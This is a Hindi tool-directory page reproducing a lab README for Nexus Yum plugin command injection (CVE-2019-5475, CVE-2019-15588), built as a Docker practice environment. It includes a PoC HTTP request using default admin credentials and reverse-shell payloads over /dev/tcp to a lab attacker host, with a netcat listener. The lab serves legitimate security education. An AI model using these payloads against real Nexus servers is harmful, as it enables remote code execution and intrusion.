Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-5475 — CVE-2019-5475 रेंज: RCE कमांड इंजेक्शन भेद्यता | Kitploit
उपकरण/GitHubGitHub/exp-docs/cve-2019-5475
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

CVE-2019-5475 रेंज: RCE कमांड इंजेक्शन भेद्यता

रिपॉजिटरी देखें
533 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-5475

CVE-2019-5475 और CVE-2019-15588 लैब: RCE कमांड इंजेक्शन भेद्यता


0x00 पृष्ठभूमि

CVE-2019-5475, Nexus के अंतर्निहित प्लगइन Yum Repository में RCE कमांड इंजेक्शन भेद्यता है, जिसे सबसे पहले hackerone पर प्रकट किया गया था, लेकिन आधिकारिक पहला सुधार अधूरा होने के कारण, CVE-2019-15588 भेद्यता भी उत्पन्न हुई।

इन दोनों भेद्यताओं का उपयोग केवल admin के रूप में लॉग इन करने के बाद ही किया जा सकता है, लेकिन nexus का डिफ़ॉल्ट व्यवस्थापक पासवर्ड admin123 अक्सर बदलना भूल दिया जाता है, जिससे इनका शोषण करना बहुत आसान हो जाता है।

0x10 लैब वातावरण

0x20 निर्देशिका संरचना

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [डीबग के लिए Maven प्रोजेक्ट: nexus GUI में createrepo या mergerepo इनपुट का अनुकरण]
├── nexus ................... [Nexus कंटेनर की डेटा माउंट निर्देशिका]
├── attacker ................ [हमलावर मशीन की निर्माण निर्देशिका]
│   └── Dockerfile .......... [हमलावर मशीन की Docker निर्माण फ़ाइल]
├── docker-compose.yml ...... [Docker की निर्माण कॉन्फ़िगरेशन]
├── imgs .................... [README स्पष्टीकरण में सहायक चित्र]
└── README.md ............... [यह README स्पष्टीकरण]

0x40 लैब सेटअप

  • होस्ट मशीन पर docker और docker-compose पहले से इंस्टॉल होना चाहिए
  • यह रिपॉज़िटरी डाउनलोड करें: git clone https://github.com/lyy289065406/CVE-2019-5475
  • Nexus निर्माण निर्देशिका खोलें: cd CVE-2019-5475
  • Nexus बनाएं और चलाएं: docker-compose up -d
  • लगभग 5 मिनट बाद ब्राउज़र से Nexus तक पहुँचा जा सकता है (BasicAuth admin/admin123 है), जहाँ:
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

इस लैब में एक हमलावर मशीन 172.168.50.2 भी स्थापित की गई है, जो दोनों लक्ष्य मशीनों के समान नेटवर्क वातावरण में है, और इसका उद्देश्य रिवर्स शेल को सत्यापित करना है।

0x50 【CVE-2019-5475】लैब सत्यापन

0x51 PoC

admin से http://127.0.0.1:8009/nexus/#capabilities में लॉग इन करें, Administration -> Capabilities -> Yum: Configuration -> Settings में RCE इंजेक्शन पॉइंट पाया जा सकता है।

इनपुट बॉक्स Path of "createrepo" और Path of "mergerepo" दोनों में इंजेक्शन लगाया जा सकता है, निष्पादन परिणाम Status से देखे जा सकते हैं।

उदाहरण के लिए, createrepo इंजेक्शन पॉइंट पर PoC bash -c id || python बनाने पर, Status से कमांड bash -c id का निष्पादन परिणाम uid=200(nexus) gid=200(nexus) groups=200(nexus) प्राप्त होता है।

BurpSuite के माध्यम से संबंधित PoC अनुरोध इस प्रकार इंटरसेप्ट किया जा सकता है:

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

इस इंजेक्शन पॉइंट का उपयोग आसानी से रिवर्स शेल बनाने के लिए किया जा सकता है:

  • हमलावर मशीन में लॉग इन करें: docker exec -it -u root docker_attacker /bin/bash
  • रिवर्स कनेक्शन सुनने के लिए netcat का उपयोग करें: nc -lvvp 4444
  • उपरोक्त createrepo इंजेक्शन पॉइंट पर payload बनाएं: bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 【CVE-2019-15588】लैब सत्यापन

0x61 PoC

इंजेक्शन स्थान CVE-2019-5475 के समान है, PoC को इस प्रकार समायोजित करें: /bin/bash -c id || /createrepo

0x62 EXP

इस भेद्यता का उपयोग करके उसी विधि से रिवर्स शेल प्राप्त किया जा सकता है:

  • हमलावर मशीन में लॉग इन करें: docker exec -it -u root docker_attacker /bin/bash
  • रिवर्स कनेक्शन सुनने के लिए netcat का उपयोग करें: nc -lvvp 4444
  • createrepo इंजेक्शन पॉइंट पर payload बनाएं: /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 भेद्यता सुधार

  • CVE-2019-5475 के लिए: आधिकारिक पहला सुधार पैच
  • CVE-2019-15588 के लिए: आधिकारिक दूसरा सुधार पैच

0x80 nexus-yum-core के बारे में

nexus-yum-core nexus में इस भेद्यता शोषण से संबंधित मुख्य कोड स्निपेट है, जिसका उपयोग मुख्य रूप से बैकएंड से सीधे इनपुट payload के डीबग विश्लेषण के लिए किया जाता है, बिना स्रोत कोड से पूर्ण Nexus सेवा तैयार किए।

0x90 संदर्भ सामग्री

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
टूल डाउनलोड करें